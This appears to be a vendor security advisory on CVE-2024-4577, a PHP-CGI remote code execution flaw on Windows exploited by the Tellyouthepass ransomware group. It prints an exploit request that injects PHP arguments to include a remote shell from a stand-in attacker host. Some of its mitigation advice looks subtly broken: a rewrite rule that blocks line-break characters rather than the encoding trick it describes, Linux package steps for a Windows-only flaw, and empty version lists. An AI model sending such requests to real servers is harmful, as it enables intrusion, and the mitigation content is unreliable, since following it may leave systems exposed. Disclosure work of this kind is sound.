CVE-2024-4577 affects users of PHP on Windows and can cause challenges for those who don't take the necessary mitigation steps. Here's more.
CVE-2024-4577 is a critical remote code execution (RCE) vulnerability in PHP on Windows, identified by the security research team at DEVCORE. This vulnerability has the potential to allow attackers to execute arbitrary code on a remote server, posing significant risks to millions of websites that rely on PHP for their backend operations.
Here’s what you need to know:
Affected products: |
Web servers running PHP in CGI mode |
Product category: |
Web Server |
Severity: |
Critical |
Type: |
Remote Code Execution (RCE) |
Impact: |
Unauthorized command execution on the server, Potential for full system compromise Deployment of ransomware (e.g., Tellyouthepass) |
PoC: |
|
Exploit in the wild |
Yes – Tellyouthepass ransomware group |
CISA Catalog |
Yes |
Remediation action |
Apply latest patches provided by the PHP development team |
MITRE advisory |
CVE-2024-4577 is a remote code execution (RCE) vulnerability affecting PHP installations on Windows operating systems. The vulnerability has recently come under the spotlight due to its exploitation in widespread attacks, particularly involving the Tellyouthepass ransomware.
Discovered by Orange Tsai, a researcher at Devcore, The Critical RCE vulnerability in the PHP CGI (Common Gateway Interface) allows attackers to inject arbitrary arguments into PHP processes, leading to unauthorized command execution on the server. This vulnerability affects all versions of PHP for Windows, posing a significant risk to web servers that run PHP in CGI mode.
The flaw vulnerability arises from an issue in the encoding conversion process, specifically within the ‘Best-Fit’ feature of PHP on Windows. The problem is linked to the handling of certain character sequences that can bypass protections meant to prevent exploitation of a previous vulnerability (CVE-2012-1823).
The vulnerability allows an attacker to craft a specially formatted HTTP request that can inject arguments into the PHP-CGI executable. Improper handling of query parameters in CGI mode, might give attackers the ability to manipulate the input to execute malicious commands.
This injection can lead to arbitrary code execution on the server, thereby compromising the integrity, confidentiality, and availability of the affected systems. For example, an attacker might exploit this by sending a specially crafted request to the server, forcing the server to include and execute a remote file, allowing the attacker to gain control over the system:
GET /index.php?-d+allow_url_include%3dOn+-d+auto_prepend_file%3dhttp://malicious-server.com/shell.txt HTTP/1.1 Host: vulnerable-site.com
The affected versions of PHP are:
CVE-2024-4577 affects any web server running PHP in CGI mode running on Windows that has not been updated with the latest security patches, due to the nature of the encoding conversion issue.
If you are running a PHP environment on a Windows server, you are potentially vulnerable to CVE-2024-4577, especially if you are using PHP versions mentioned above. Websites and applications that depend on PHP for their server-side scripting are at risk, making it imperative for administrators and developers to determine their exposure and take appropriate actions.
The key factors determining whether you are affected include:
If your setup matches these criteria, your systems are at risk, and immediate action is required to mitigate the threat.
Yes, there have been reports of active exploitation attempts of CVE-2024-4577. Shortly after the vulnerability was disclosed, discussions and proof-of-concept (PoC) exploits began circulating in various hacker forums and platforms. Security researchers from DEVCORE, who discovered the vulnerability, have noted that the technical details and PoC code are already being used to target vulnerable systems.
According to a detailed technical analysis by Watchtowr Labs, the vulnerability has been leveraged by the Tellyouthepass ransomware group to compromise and control vulnerable servers. BleepingComputer reported that this ransomware campaign has quickly weaponized the flaw to breach servers and encrypt data, leading to significant disruptions for affected organizations.
Additionally, Censys observed a spike in scanning activity targeting this vulnerabilityfixes, indicating widespread interest and exploitation attempts by malicious actors. This underscores the urgency of addressing this vulnerability promptly.
Given the critical nature of the vulnerability and the widespread use of PHP, the risk of exploitation is high. Attackers can leverage this vulnerability to gain control over affected servers, deploy malware, steal sensitive data, and disrupt services.
As shown in DEVCORE’s research and disclosure of this vulnerability, CVE-2024-4577 is a critical vulnerability that demands immediate attention from PHP administrators and developers. To protect your systems from CVE-2024-4577, it is crucial to take immediate action by following these steps with necessary measures to mitigate this vulnerability:
The primary and most effective mitigation is to upgrade PHP to the latest versions that contain the patches for CVE-2024-4577. The PHP development team has released fixes in the recent changelog for PHP 8 addressing this issue, ensure that your PHP installation is updated to one of the following versions:
Updating PHP can be done by downloading the latest version from the official PHP website.
# On Linux systems, update PHP via your package manager
sudo apt-get update
sudo apt-get install php
# On Windows, download the latest PHP binaries from the official PHP website and replace your current installation
If possible, configure your web server to avoid running PHP in CGI mode. Instead, use PHP-FPM (FastCGI Process Manager) or mod_php with Apache for better security and performance.
Use a WAF to filter and block malicious requests targeting the vulnerability. Imperva provides solutions to protect against such exploits.
If immediate updating is not feasible, temporary mitigations can help reduce the risk. These include:
RewriteEngine On
RewriteCond %{QUERY_STRING} ^(.*)(%0d|%0a|%0D|%0A)(.*)$ [NC]
RewriteRule .* – [F]
Each new vulnerability is a reminder of where we stand and what we need to do better. Check out the following resources to help you maintain cyber hygiene and stay ahead of the threat actors: